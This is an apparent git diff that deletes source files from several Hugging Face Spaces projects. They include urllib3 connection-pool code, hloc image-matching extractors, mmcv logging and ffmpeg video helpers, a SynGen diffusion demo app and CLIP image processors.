headers=headers, - chunked=chunked, - ) - - # If we're going to release the connection in ``finally:``, then - # the response doesn't need to know about the connection. Otherwise - # it will also try to release it and we'll have a double-release - # mess. - response_conn = conn if not release_conn else None - - # Pass method to Response for length checking - response_kw["request_method"] = method - - # Import httplib's response into our own wrapper object - response = self.ResponseCls.from_httplib( - httplib_response, - pool=self, - connection=response_conn, - retries=retries, - **response_kw - ) - - # Everything went great! - clean_exit = True - - except EmptyPoolError: - # Didn't get a connection from the pool, no need to clean up - clean_exit = True - release_this_conn = False - raise - - except ( - TimeoutError, - HTTPException, - SocketError, - ProtocolError, - BaseSSLError, - SSLError, - CertificateError, - ) as e: - # Discard the connection for these exceptions. It will be - # replaced during the next _get_conn() call. - clean_exit = False - - def _is_ssl_error_message_from_http_proxy(ssl_error): - # We're trying to detect the message 'WRONG_VERSION_NUMBER' but - # SSLErrors are kinda all over the place when it comes to the message, - # so we try to cover our bases here! - message = " ".join(re.split("[^a-z]", str(ssl_error).lower())) - return ( - "wrong version number" in message or "unknown protocol" in message - ) - - # Try to detect a common user error with proxies which is to - # set an HTTP proxy to be HTTPS when it should be 'http://' - # (ie {'http': 'http://proxy', 'https': 'https://proxy'}) - # Instead we add a nice error message and point to a URL. - if ( - isinstance(e, BaseSSLError) - and self.proxy - and _is_ssl_error_message_from_http_proxy(e) - and conn.proxy - and conn.proxy.scheme == "https" - ): - e = ProxyError( - "Your proxy appears to only use HTTP and not HTTPS, " - "try changing your proxy URL to be HTTP. See: " - "https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html" - "#https-proxy-error-http-proxy", - SSLError(e), - ) - elif isinstance(e, (BaseSSLError, CertificateError)): - e = SSLError(e) - elif isinstance(e, (SocketError, NewConnectionError)) and self.proxy: - e = ProxyError("Cannot connect to proxy.", e) - elif isinstance(e, (SocketError, HTTPException)): - e = ProtocolError("Connection aborted.", e) - - retries = retries.increment( - method, url, error=e, _pool=self, _stacktrace=sys.exc_info()[2] - ) - retries.sleep() - - # Keep track of the error for the retry warning. - err = e - - finally: - if not clean_exit: - # We hit some kind of exception, handled or otherwise. We need - # to throw the connection away unless explicitly told not to. - # Close the connection, set the variable to None, and make sure - # we put the None back in the pool to avoid leaking it. - conn = conn and conn.close() - release_this_conn = True - - if release_this_conn: - # Put the connection back to be reused. If the connection is - # expired then it will be None, which will get replaced with a - # fresh connection during _get_conn. - self._put_conn(conn) - - if not conn: - # Try again - log.warning( - "Retrying (%r) after connection broken by '%r': %s", retries, err, url - ) - return self.urlopen( - method, - url, - body, - headers, - retries, - redirect, - assert_same_host, - timeout=timeout, - pool_timeout=pool_timeout, - release_conn=release_conn, - chunked=chunked, - body_pos=body_pos, - **response_kw - ) - - # Handle redirect? - redirect_location = redirect and response.get_redirect_location() - if redirect_location: - if response.status == 303: - method = "GET" - - try: - retries = retries.increment(method, url, response=response, _pool=self) - except MaxRetryError: - if retries.raise_on_redirect: - response.drain_conn() - raise - return response - - response.drain_conn() - retries.sleep_for_retry(response) - log.debug("Redirecting %s -> %s", url, redirect_location) - return self.urlopen( - method, - redirect_location, - body, - headers, - retries=retries, - redirect=redirect, - assert_same_host=assert_same_host, - timeout=timeout, - pool_timeout=pool_timeout, - release_conn=release_conn, - chunked=chunked, - body_pos=body_pos, - **response_kw - ) - - # Check if we should retry the HTTP response. - has_retry_after = bool(response.getheader("Retry-After")) - if retries.is_retry(method, response.status, has_retry_after): - try: - retries = retries.increment(method, url, response=response, _pool=self) - except MaxRetryError: - if retries.raise_on_status: - response.drain_conn() - raise - return response - - response.drain_conn() - retries.sleep(response) - log.debug("Retry: %s", url) - return self.urlopen( - method, - url, - body, - headers, - retries=retries, - redirect=redirect, - assert_same_host=assert_same_host, - timeout=timeout, - pool_timeout=pool_timeout, - release_conn=release_conn, - chunked=chunked, - body_pos=body_pos, - **response_kw - ) - - return response - - -class HTTPSConnectionPool(HTTPConnectionPool): - """ - Same as :class:`.HTTPConnectionPool`, but HTTPS. - - :class:`.HTTPSConnection` uses one of ``assert_fingerprint``, - ``assert_hostname`` and ``host`` in this order to verify connections. - If ``assert_hostname`` is False, no verification is done. - - The ``key_file``, ``cert_file``, ``cert_reqs``, ``ca_certs``, - ``ca_cert_dir``, ``ssl_version``, ``key_password`` are only used if :mod:`ssl` - is available and are fed into :meth:`urllib3.util.ssl_wrap_socket` to upgrade - the connection socket into an SSL socket. - """ - - scheme = "https" - ConnectionCls = HTTPSConnection - - def __init__( - self, - host, - port=None, - strict=False, - timeout=Timeout.DEFAULT_TIMEOUT, - maxsize=1, - block=False, - headers=None, - retries=None, - _proxy=None, - _proxy_headers=None, - key_file=None, - cert_file=None, - cert_reqs=None, - key_password=None, - ca_certs=None, - ssl_version=None, - assert_hostname=None, - assert_fingerprint=None, - ca_cert_dir=None, - **conn_kw - ): - - HTTPConnectionPool.__init__( - self, - host, - port, - strict, - timeout, - maxsize, - block, - headers, - retries, - _proxy, - _proxy_headers, - **conn_kw - ) - - self.key_file = key_file - self.cert_file = cert_file - self.cert_reqs = cert_reqs - self.key_password = key_password - self.ca_certs = ca_certs - self.ca_cert_dir = ca_cert_dir - self.ssl_version = ssl_version - self.assert_hostname = assert_hostname - self.assert_fingerprint = assert_fingerprint - - def _prepare_conn(self, conn): - """ - Prepare the ``connection`` for :meth:`urllib3.util.ssl_wrap_socket` - and establish the tunnel if proxy is used. - """ - - if isinstance(conn, VerifiedHTTPSConnection): - conn.set_cert( - key_file=self.key_file, - key_password=self.key_password, - cert_file=self.cert_file, - cert_reqs=self.cert_reqs, - ca_certs=self.ca_certs, - ca_cert_dir=self.ca_cert_dir, - assert_hostname=self.assert_hostname, - assert_fingerprint=self.assert_fingerprint, - ) - conn.ssl_version = self.ssl_version - return conn - - def _prepare_proxy(self, conn): - """ - Establishes a tunnel connection through HTTP CONNECT. - - Tunnel connection is established early because otherwise httplib would - improperly set Host: header to proxy's IP:port. - """ - - conn.set_tunnel(self._proxy_host, self.port, self.proxy_headers) - - if self.proxy.scheme == "https": - conn.tls_in_tls_required = True - - conn.connect() - - def _new_conn(self): - """ - Return a fresh :class:`http.client.HTTPSConnection`. - """ - self.num_connections += 1 - log.debug( - "Starting new HTTPS connection (%d): %s:%s", - self.num_connections, - self.host, - self.port or "443", - ) - - if not self.ConnectionCls or self.ConnectionCls is DummyConnection: - raise SSLError( - "Can't connect to HTTPS URL because the SSL module is not available." - ) - - actual_host = self.host - actual_port = self.port - if self.proxy is not None: - actual_host = self.proxy.host - actual_port = self.proxy.port - - conn = self.ConnectionCls( - host=actual_host, - port=actual_port, - timeout=self.timeout.connect_timeout, - strict=self.strict, - cert_file=self.cert_file, - key_file=self.key_file, - key_password=self.key_password, - **self.conn_kw - ) - - return self._prepare_conn(conn) - - def _validate_conn(self, conn): - """ - Called right before a request is made, after the socket is created. - """ - super(HTTPSConnectionPool, self)._validate_conn(conn) - - # Force connect early to allow us to validate the connection. - if not getattr(conn, "sock", None): # AppEngine might not have `.sock` - conn.connect() - - if not conn.is_verified: - warnings.warn( - ( - "Unverified HTTPS request is being made to host '%s'. " - "Adding certificate verification is strongly advised. See: " - "https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html" - "#ssl-warnings" % conn.host - ), - InsecureRequestWarning, - ) - - if getattr(conn, "proxy_is_verified", None) is False: - warnings.warn( - ( - "Unverified HTTPS connection done to an HTTPS proxy. " - "Adding certificate verification is strongly advised. See: " - "https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html" - "#ssl-warnings" - ), - InsecureRequestWarning, - ) - - -def connection_from_url(url, **kw): - """ - Given a url, return an :class:`.ConnectionPool` instance of its host. - - This is a shortcut for not having to parse out the scheme, host, and port - of the url before creating an :class:`.ConnectionPool` instance. - - :param url: - Absolute URL string that must include the scheme. Port is optional. - - :param \\**kw: - Passes additional parameters to the constructor of the appropriate - :class:`.ConnectionPool`. Useful for specifying things like - timeout, maxsize, headers, etc. - - Example:: - - >>> conn = connection_from_url('http://google.com/') - >>> r = conn.request('GET', '/') - """ - scheme, host, port = get_host(url) - port = port or port_by_scheme.get(scheme, 80) - if scheme == "https": - return HTTPSConnectionPool(host, port=port, **kw) - else: - return HTTPConnectionPool(host, port=port, **kw) - - -def _normalize_host(host, scheme): - """ - Normalize hosts for comparisons and use with sockets. - """ - - host = normalize_host(host, scheme) - - # httplib doesn't like it when we include brackets in IPv6 addresses - # Specifically, if we include brackets but also pass the port then - # httplib crazily doubles up the square brackets on the Host header. - # Instead, we need to make sure we never pass ``None`` as the port. - # However, for backward compatibility reasons we can't actually - # *assert* that. See http://bugs.python.org/issue28539 - if host.startswith("[") and host.endswith("]"): - host = host[1:-1] - return host diff --git a/spaces/Realcat/image-matching-webui/hloc/extractors/openibl.py b/spaces/Realcat/image-matching-webui/hloc/extractors/openibl.py deleted file mode 100644 index 9e332a4e0016fceb184dd850bd3b6f86231dad54..0000000000000000000000000000000000000000 --- a/spaces/Realcat/image-matching-webui/hloc/extractors/openibl.py +++ /dev/null @@ -1,26 +0,0 @@ -import torch -import torchvision.transforms as tvf - -from ..utils.base_model import BaseModel - - -class OpenIBL(BaseModel): - default_conf = { - "model_name": "vgg16_netvlad", - } - required_inputs = ["image"] - - def _init(self, conf): - self.net = torch.hub.load( - "yxgeee/OpenIBL", conf["model_name"], pretrained=True - ).eval() - mean = [0.48501960784313836, 0.4579568627450961, 0.4076039215686255] - std = [0.00392156862745098, 0.00392156862745098, 0.00392156862745098] - self.norm_rgb = tvf.Normalize(mean=mean, std=std) - - def _forward(self, data): - image = self.norm_rgb(data["image"]) - desc = self.net(image) - return { - "global_descriptor": desc, - } diff --git a/spaces/Realcat/image-matching-webui/hloc/matchers/gluestick.py b/spaces/Realcat/image-matching-webui/hloc/matchers/gluestick.py deleted file mode 100644 index 093ba3665c95ac881ae22682497fb5af5722a55b..0000000000000000000000000000000000000000 --- a/spaces/Realcat/image-matching-webui/hloc/matchers/gluestick.py +++ /dev/null @@ -1,109 +0,0 @@ -import sys -from pathlib import Path -import subprocess -import torch -from ..utils.base_model import BaseModel -from .. import logger - -gluestick_path = Path(__file__).parent / "../../third_party/GlueStick" -sys.path.append(str(gluestick_path)) - -from gluestick import batch_to_np -from gluestick.models.two_view_pipeline import TwoViewPipeline - -device = torch.device("cuda" if torch.cuda.is_available() else "cpu") - - -class GlueStick(BaseModel): - default_conf = { - "name": "two_view_pipeline", - "model_name": "checkpoint_GlueStick_MD.tar", - "use_lines": True, - "max_keypoints": 1000, - "max_lines": 300, - "force_num_keypoints": False, - } - required_inputs = [ - "image0", - "image1", - ] - - gluestick_models = { - "checkpoint_GlueStick_MD.tar": "https://github.com/cvg/GlueStick/releases/download/v0.1_arxiv/checkpoint_GlueStick_MD.tar", - } - - # Initialize the line matcher - def _init(self, conf): - model_path = ( - gluestick_path / "resources" / "weights" / conf["model_name"] - ) - - # Download the model. - if not model_path.exists(): - model_path.parent.mkdir(exist_ok=True) - link = self.gluestick_models[conf["model_name"]] - cmd = ["wget", link, "-O", str(model_path)] - logger.info(f"Downloading the Gluestick model with `{cmd}`.") - subprocess.run(cmd, check=True) - logger.info(f"Loading GlueStick model...") - - gluestick_conf = { - "name": "two_view_pipeline", - "use_lines": True, - "extractor": { - "name": "wireframe", - "sp_params": { - "force_num_keypoints": False, - "max_num_keypoints": 1000, - }, - "wireframe_params": { - "merge_points": True, - "merge_line_endpoints": True, - }, - "max_n_lines": 300, - }, - "matcher": { - "name": "gluestick", - "weights": str(model_path), - "trainable": False, - }, - "ground_truth": { - "from_pose_depth": False, - }, - } - gluestick_conf["extractor"]["sp_params"]["max_num_keypoints"] = conf[ - "max_keypoints" - ] - gluestick_conf["extractor"]["sp_params"]["force_num_keypoints"] = conf[ - "force_num_keypoints" - ] - gluestick_conf["extractor"]["max_n_lines"] = conf["max_lines"] - self.net = TwoViewPipeline(gluestick_conf) - - def _forward(self, data): - pred = self.net(data) - - pred = batch_to_np(pred) - kp0, kp1 = pred["keypoints0"], pred["keypoints1"] - m0 = pred["matches0"] - - line_seg0, line_seg1 = pred["lines0"], pred["lines1"] - line_matches = pred["line_matches0"] - - valid_matches = m0 != -1 - match_indices = m0[valid_matches] - matched_kps0 = kp0[valid_matches] - matched_kps1 = kp1[match_indices] - - valid_matches = line_matches != -1 - match_indices = line_matches[valid_matches] - matched_lines0 = line_seg0[valid_matches] - matched_lines1 = line_seg1[match_indices] - - pred["raw_lines0"], pred["raw_lines1"] = line_seg0, line_seg1 - pred["lines0"], pred["lines1"] = matched_lines0, matched_lines1 - pred["keypoints0"], pred["keypoints1"] = torch.from_numpy( - matched_kps0 - ), torch.from_numpy(matched_kps1) - pred = {**pred, **data} - return pred diff --git a/spaces/Ricdeq/optimaldesign/setup.py b/spaces/Ricdeq/optimaldesign/setup.py deleted file mode 100644 index c422479f8b8751a704b23d7fbac88ccbe075360e..0000000000000000000000000000000000000000 --- a/spaces/Ricdeq/optimaldesign/setup.py +++ /dev/null @@ -1,19 +0,0 @@ -from setuptools import setup, find_packages - -setup( - name='blueprint_analyzer', - version='0.1', - packages=find_packages(), - install_requires=[ - 'gradio', - 'torch', - 'torchvision', - 'Pillow', -], - - entry_points={ - 'console_scripts': [ - 'analyze_blueprint=blueprint_analyzer.analyze_blueprint:main', - ], - }, -) diff --git a/spaces/Robert001/UniControl-Demo/annotator/uniformer/mmcv/runner/hooks/logger/text.py b/spaces/Robert001/UniControl-Demo/annotator/uniformer/mmcv/runner/hooks/logger/text.py deleted file mode 100644 index 87b1a3eca9595a130121526f8b4c29915387ab35..0000000000000000000000000000000000000000 --- a/spaces/Robert001/UniControl-Demo/annotator/uniformer/mmcv/runner/hooks/logger/text.py +++ /dev/null @@ -1,256 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -import datetime -import os -import os.path as osp -from collections import OrderedDict - -import torch -import torch.distributed as dist - -import annotator.uniformer.mmcv as mmcv -from annotator.uniformer.mmcv.fileio.file_client import FileClient -from annotator.uniformer.mmcv.utils import is_tuple_of, scandir -from ..hook import HOOKS -from .base import LoggerHook - - -@HOOKS.register_module() -class TextLoggerHook(LoggerHook): - """Logger hook in text. - - In this logger hook, the information will be printed on terminal and - saved in json file. - - Args: - by_epoch (bool, optional): Whether EpochBasedRunner is used. - Default: True. - interval (int, optional): Logging interval (every k iterations). - Default: 10. - ignore_last (bool, optional): Ignore the log of last iterations in each - epoch if less than :attr:`interval`. Default: True. - reset_flag (bool, optional): Whether to clear the output buffer after - logging. Default: False. - interval_exp_name (int, optional): Logging interval for experiment - name. This feature is to help users conveniently get the experiment - information from screen or log file. Default: 1000. - out_dir (str, optional): Logs are saved in ``runner.work_dir`` default. - If ``out_dir`` is specified, logs will be copied to a new directory - which is the concatenation of ``out_dir`` and the last level - directory of ``runner.work_dir``. Default: None. - `New in version 1.3.16.` - out_suffix (str or tuple[str], optional): Those filenames ending with - ``out_suffix`` will be copied to ``out_dir``. - Default: ('.log.json', '.log', '.py'). - `New in version 1.3.16.` - keep_local (bool, optional): Whether to keep local log when - :attr:`out_dir` is specified. If False, the local log will be - removed. Default: True. - `New in version 1.3.16.` - file_client_args (dict, optional): Arguments to instantiate a - FileClient. See :class:`mmcv.fileio.FileClient` for details. - Default: None. - `New in version 1.3.16.` - """ - - def __init__(self, - by_epoch=True, - interval=10, - ignore_last=True, - reset_flag=False, - interval_exp_name=1000, - out_dir=None, - out_suffix=('.log.json', '.log', '.py'), - keep_local=True, - file_client_args=None): - super(TextLoggerHook, self).__init__(interval, ignore_last, reset_flag, - by_epoch) - self.by_epoch = by_epoch - self.time_sec_tot = 0 - self.interval_exp_name = interval_exp_name - - if out_dir is None and file_client_args is not None: - raise ValueError( - 'file_client_args should be "None" when `out_dir` is not' - 'specified.') - self.out_dir = out_dir - - if not (out_dir is None or isinstance(out_dir, str) - or is_tuple_of(out_dir, str)): - raise TypeError('out_dir should be "None" or string or tuple of ' - 'string, but got {out_dir}') - self.out_suffix = out_suffix - - self.keep_local = keep_local - self.file_client_args = file_client_args - if self.out_dir is not None: - self.file_client = FileClient.infer_client(file_client_args, - self.out_dir) - - def before_run(self, runner): - super(TextLoggerHook, self).before_run(runner) - - if self.out_dir is not None: - self.file_client = FileClient.infer_client(self.file_client_args, - self.out_dir) - # The final `self.out_dir` is the concatenation of `self.out_dir` - # and the last level directory of `runner.work_dir` - basename = osp.basename(runner.work_dir.rstrip(osp.sep)) - self.out_dir = self.file_client.join_path(self.out_dir, basename) - runner.logger.info( - (f'Text logs will be saved to {self.out_dir} by ' - f'{self.file_client.name} after the training process.')) - - self.start_iter = runner.iter - self.json_log_path = osp.join(runner.work_dir, - f'{runner.timestamp}.log.json') - if runner.meta is not None: - self._dump_log(runner.meta, runner) - - def _get_max_memory(self, runner): - device = getattr(runner.model, 'output_device', None) - mem = torch.cuda.max_memory_allocated(device=device) - mem_mb = torch.tensor([mem / (1024 * 1024)], - dtype=torch.int, - device=device) - if runner.world_size > 1: - dist.reduce(mem_mb, 0, op=dist.ReduceOp.MAX) - return mem_mb.item() - - def _log_info(self, log_dict, runner): - # print exp name for users to distinguish experiments - # at every ``interval_exp_name`` iterations and the end of each epoch - if runner.meta is not None and 'exp_name' in runner.meta: - if (self.every_n_iters(runner, self.interval_exp_name)) or ( - self.by_epoch and self.end_of_epoch(runner)): - exp_info = f'Exp name: {runner.meta["exp_name"]}' - runner.logger.info(exp_info) - - if log_dict['mode'] == 'train': - if isinstance(log_dict['lr'], dict): - lr_str = [] - for k, val in log_dict['lr'].items(): - lr_str.append(f'lr_{k}: {val:.3e}') - lr_str = ' '.join(lr_str) - else: - lr_str = f'lr: {log_dict["lr"]:.3e}' - - # by epoch: Epoch [4][100/1000] - # by iter: Iter [100/100000] - if self.by_epoch: - log_str = f'Epoch [{log_dict["epoch"]}]' \ - f'[{log_dict["iter"]}/{len(runner.data_loader)}]\t' - else: - log_str = f'Iter [{log_dict["iter"]}/{runner.max_iters}]\t' - log_str += f'{lr_str}, ' - - if 'time' in log_dict.keys(): - self.time_sec_tot += (log_dict['time'] * self.interval) - time_sec_avg = self.time_sec_tot / ( - runner.iter - self.start_iter + 1) - eta_sec = time_sec_avg * (runner.max_iters - runner.iter - 1) - eta_str = str(datetime.timedelta(seconds=int(eta_sec))) - log_str += f'eta: {eta_str}, ' - log_str += f'time: {log_dict["time"]:.3f}, ' \ - f'data_time: {log_dict["data_time"]:.3f}, ' - # statistic memory - if torch.cuda.is_available(): - log_str += f'memory: {log_dict["memory"]}, ' - else: - # val/test time - # here 1000 is the length of the val dataloader - # by epoch: Epoch[val] [4][1000] - # by iter: Iter[val] [1000] - if self.by_epoch: - log_str = f'Epoch({log_dict["mode"]}) ' \ - f'[{log_dict["epoch"]}][{log_dict["iter"]}]\t' - else: - log_str = f'Iter({log_dict["mode"]}) [{log_dict["iter"]}]\t' - - log_items = [] - for name, val in log_dict.items(): - # TODO: resolve this hack - # these items have been in log_str - if name in [ - 'mode', 'Epoch', 'iter', 'lr', 'time', 'data_time', - 'memory', 'epoch' - ]: - continue - if isinstance(val, float): - val = f'{val:.4f}' - log_items.append(f'{name}: {val}') - log_str += ', '.join(log_items) - - runner.logger.info(log_str) - - def _dump_log(self, log_dict, runner): - # dump log in json format - json_log = OrderedDict() - for k, v in log_dict.items(): - json_log[k] = self._round_float(v) - # only append log at last line - if runner.rank == 0: - with open(self.json_log_path, 'a+') as f: - mmcv.dump(json_log, f, file_format='json') - f.write('\n') - - def _round_float(self, items): - if isinstance(items, list): - return [self._round_float(item) for item in items] - elif isinstance(items, float): - return round(items, 5) - else: - return items - - def log(self, runner): - if 'eval_iter_num' in runner.log_buffer.output: - # this doesn't modify runner.iter and is regardless of by_epoch - cur_iter = runner.log_buffer.output.pop('eval_iter_num') - else: - cur_iter = self.get_iter(runner, inner_iter=True) - - log_dict = OrderedDict( - mode=self.get_mode(runner), - epoch=self.get_epoch(runner), - iter=cur_iter) - - # only record lr of the first param group - cur_lr = runner.current_lr() - if isinstance(cur_lr, list): - log_dict['lr'] = cur_lr[0] - else: - assert isinstance(cur_lr, dict) - log_dict['lr'] = {} - for k, lr_ in cur_lr.items(): - assert isinstance(lr_, list) - log_dict['lr'].update({k: lr_[0]}) - - if 'time' in runner.log_buffer.output: - # statistic memory - if torch.cuda.is_available(): - log_dict['memory'] = self._get_max_memory(runner) - - log_dict = dict(log_dict, **runner.log_buffer.output) - - self._log_info(log_dict, runner) - self._dump_log(log_dict, runner) - return log_dict - - def after_run(self, runner): - # copy or upload logs to self.out_dir - if self.out_dir is not None: - for filename in scandir(runner.work_dir, self.out_suffix, True): - local_filepath = osp.join(runner.work_dir, filename) - out_filepath = self.file_client.join_path( - self.out_dir, filename) - with open(local_filepath, 'r') as f: - self.file_client.put_text(f.read(), out_filepath) - - runner.logger.info( - (f'The file {local_filepath} has been uploaded to ' - f'{out_filepath}.')) - - if not self.keep_local: - os.remove(local_filepath) - runner.logger.info( - (f'{local_filepath} was removed due to the ' - '`self.keep_local=False`')) diff --git a/spaces/Robert001/UniControl-Demo/annotator/uniformer_base/mmcv/video/processing.py b/spaces/Robert001/UniControl-Demo/annotator/uniformer_base/mmcv/video/processing.py deleted file mode 100644 index 3d90b96e0823d5f116755e7f498d25d17017224a..0000000000000000000000000000000000000000 --- a/spaces/Robert001/UniControl-Demo/annotator/uniformer_base/mmcv/video/processing.py +++ /dev/null @@ -1,160 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -import os -import os.path as osp -import subprocess -import tempfile - -from annotator.uniformer.mmcv.utils import requires_executable - - -@requires_executable('ffmpeg') -def convert_video(in_file, - out_file, - print_cmd=False, - pre_options='', - **kwargs): - """Convert a video with ffmpeg. - - This provides a general api to ffmpeg, the executed command is:: - - `ffmpeg -y -i ` - - Options(kwargs) are mapped to ffmpeg commands with the following rules: - - - key=val: "-key val" - - key=True: "-key" - - key=False: "" - - Args: - in_file (str): Input video filename. - out_file (str): Output video filename. - pre_options (str): Options appears before "-i ". - print_cmd (bool): Whether to print the final ffmpeg command. - """ - options = [] - for k, v in kwargs.items(): - if isinstance(v, bool): - if v: - options.append(f'-{k}') - elif k == 'log_level': - assert v in [ - 'quiet', 'panic', 'fatal', 'error', 'warning', 'info', - 'verbose', 'debug', 'trace' - ] - options.append(f'-loglevel {v}') - else: - options.append(f'-{k} {v}') - cmd = f'ffmpeg -y {pre_options} -i {in_file} {" ".join(options)} ' \ - f'{out_file}' - if print_cmd: - print(cmd) - subprocess.call(cmd, shell=True) - - -@requires_executable('ffmpeg') -def resize_video(in_file, - out_file, - size=None, - ratio=None, - keep_ar=False, - log_level='info', - print_cmd=False): - """Resize a video. - - Args: - in_file (str): Input video filename. - out_file (str): Output video filename. - size (tuple): Expected size (w, h), eg, (320, 240) or (320, -1). - ratio (tuple or float): Expected resize ratio, (2, 0.5) means - (w*2, h*0.5). - keep_ar (bool): Whether to keep original aspect ratio. - log_level (str): Logging level of ffmpeg. - print_cmd (bool): Whether to print the final ffmpeg command. - """ - if size is None and ratio is None: - raise ValueError('expected size or ratio must be specified') - if size is not None and ratio is not None: - raise ValueError('size and ratio cannot be specified at the same time') - options = {'log_level': log_level} - if size: - if not keep_ar: - options['vf'] = f'scale={size[0]}:{size[1]}' - else: - options['vf'] = f'scale=w={size[0]}:h={size[1]}:' \ - 'force_original_aspect_ratio=decrease' - else: - if not isinstance(ratio, tuple): - ratio = (ratio, ratio) - options['vf'] = f'scale="trunc(iw*{ratio[0]}):trunc(ih*{ratio[1]})"' - convert_video(in_file, out_file, print_cmd, **options) - - -@requires_executable('ffmpeg') -def cut_video(in_file, - out_file, - start=None, - end=None, - vcodec=None, - acodec=None, - log_level='info', - print_cmd=False): - """Cut a clip from a video. - - Args: - in_file (str): Input video filename. - out_file (str): Output video filename. - start (None or float): Start time (in seconds). - end (None or float): End time (in seconds). - vcodec (None or str): Output video codec, None for unchanged. - acodec (None or str): Output audio codec, None for unchanged. - log_level (str): Logging level of ffmpeg. - print_cmd (bool): Whether to print the final ffmpeg command. - """ - options = {'log_level': log_level} - if vcodec is None: - options['vcodec'] = 'copy' - if acodec is None: - options['acodec'] = 'copy' - if start: - options['ss'] = start - else: - start = 0 - if end: - options['t'] = end - start - convert_video(in_file, out_file, print_cmd, **options) - - -@requires_executable('ffmpeg') -def concat_video(video_list, - out_file, - vcodec=None, - acodec=None, - log_level='info', - print_cmd=False): - """Concatenate multiple videos into a single one. - - Args: - video_list (list): A list of video filenames - out_file (str): Output video filename - vcodec (None or str): Output video codec, None for unchanged - acodec (None or str): Output audio codec, None for unchanged - log_level (str): Logging level of ffmpeg. - print_cmd (bool): Whether to print the final ffmpeg command. - """ - tmp_filehandler, tmp_filename = tempfile.mkstemp(suffix='.txt', text=True) - with open(tmp_filename, 'w') as f: - for filename in video_list: - f.write(f'file {osp.abspath(filename)}\n') - options = {'log_level': log_level} - if vcodec is None: - options['vcodec'] = 'copy' - if acodec is None: - options['acodec'] = 'copy' - convert_video( - tmp_filename, - out_file, - print_cmd, - pre_options='-f concat -safe 0', - **options) - os.close(tmp_filehandler) - os.remove(tmp_filename) diff --git a/spaces/Royir/SynGen/app.py b/spaces/Royir/SynGen/app.py deleted file mode 100644 index 6d4f6804a058b7071f600cdc01194c022019427b..0000000000000000000000000000000000000000 --- a/spaces/Royir/SynGen/app.py +++ /dev/null @@ -1,49 +0,0 @@ -import subprocess -def install_spacy_model(model_name): - try: - subprocess.check_call(["python", "-m", "spacy", "download", model_name]) - except subprocess.CalledProcessError as e: - print(f"Error occurred while installing the model: {model_name}") - print(f"Error details: {str(e)}") - -install_spacy_model("en_core_web_trf") - -import gradio as gr -import torch - -from syngen_diffusion_pipeline import SynGenDiffusionPipeline - - - - - -model_path = 'CompVis/stable-diffusion-v1-4' -device = torch.device('cuda:0') if torch.cuda.is_available() else torch.device('cpu') -pipe = SynGenDiffusionPipeline.from_pretrained(model_path).to(device) - - -def generate_fn(prompt, seed): - generator = torch.Generator(device.type).manual_seed(int(seed)) - result = pipe(prompt=prompt, generator=generator, num_inference_steps=50) - return result['images'][0] - -title = "SynGen" -description = """ -This is the demo for [SynGen](https://github.com/RoyiRa/Syntax-Guided-Generation), an image synthesis approach which first syntactically analyses the prompt to identify entities and their modifiers, and then uses a novel loss function that encourages the cross-attention maps to agree with the linguistic binding reflected by the syntax. Preprint: \"Linguistic Binding in Diffusion Models: Enhancing Attribute Correspondence through Attention Map Alignment\"(https://arxiv.org/abs/2306.08877). -""" - -examples = [ - ["the apple is blue and the carrot is purple", "20"], - ["a yellow flamingo and a pink sunflower", "16"], - ["a checkered bowl in a cluttered room", "77"], - ["a horned lion and a spotted monkey", "1269"] -] - -prompt_textbox = gr.Textbox(label="Prompt", placeholder="a pink sunflower and a yellow flamingo", lines=1) -seed_textbox = gr.Textbox(label="Seed", placeholder="42", lines=1) - -output = gr.Image(label="generation") -demo = gr.Interface(fn=generate_fn, inputs=[prompt_textbox, seed_textbox], outputs=output, examples=examples, - title=title, description=description, allow_flagging=False) - -demo.launch() diff --git a/spaces/Sapphire-356/Video2MC/joints_detectors/Alphapose/SPPE/src/__init__.py b/spaces/Sapphire-356/Video2MC/joints_detectors/Alphapose/SPPE/src/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/Saturdays/Cardiosight/README.md b/spaces/Saturdays/Cardiosight/README.md deleted file mode 100644 index 8ffc754740351e466e688963ba06f30be8b90617..0000000000000000000000000000000000000000 --- a/spaces/Saturdays/Cardiosight/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Cardio -emoji: 🏢 -colorFrom: blue -colorTo: blue -sdk: gradio -sdk_version: 2.9.0 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces#reference diff --git a/spaces/SeViLA/SeViLA/lavis/processors/clip_processors.py b/spaces/SeViLA/SeViLA/lavis/processors/clip_processors.py deleted file mode 100644 index 08bd066de69e01c8a90ca9f8546ab046ae08cd78..0000000000000000000000000000000000000000 --- a/spaces/SeViLA/SeViLA/lavis/processors/clip_processors.py +++ /dev/null @@ -1,92 +0,0 @@ -""" - Copyright (c) 2022, salesforce.com, inc. - All rights reserved. - SPDX-License-Identifier: BSD-3-Clause - For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/BSD-3-Clause -""" - -from lavis.common.registry import registry -from lavis.processors.blip_processors import BlipImageBaseProcessor -from omegaconf import OmegaConf -from torchvision import transforms -from torchvision.transforms.functional import InterpolationMode - - -def _convert_to_rgb(image): - return image.convert("RGB") - - -@registry.register_processor("clip_image_train") -class ClipImageTrainProcessor(BlipImageBaseProcessor): - def __init__( - self, image_size=224, mean=None, std=None, min_scale=0.9, max_scale=1.0 - ): - - super().__init__(mean=mean, std=std) - - self.transform = transforms.Compose( - [ - transforms.RandomResizedCrop( - image_size, - scale=(min_scale, max_scale), - interpolation=InterpolationMode.BICUBIC, - ), - _convert_to_rgb, - transforms.ToTensor(), - self.normalize, - ] - ) - - @classmethod - def from_config(cls, cfg=None): - if cfg is None: - cfg = OmegaConf.create() - - image_size = cfg.get("image_size", 224) - - mean = cfg.get("mean", None) - std = cfg.get("std", None) - - min_scale = cfg.get("min_scale", 0.9) - max_scale = cfg.get("max_scale", 1.0) - - return cls( - image_size=image_size, - mean=mean, - std=std, - min_scale=min_scale, - max_scale=max_scale, - ) - - -@registry.register_processor("clip_image_eval") -class ClipImageEvalProcessor(BlipImageBaseProcessor): - def __init__(self, image_size=224, mean=None, std=None): - - super().__init__(mean=mean, std=std) - - self.transform = transforms.Compose( - [ - transforms.Resize(image_size, interpolation=InterpolationMode.BICUBIC), - transforms.CenterCrop(image_size), - _convert_to_rgb, - 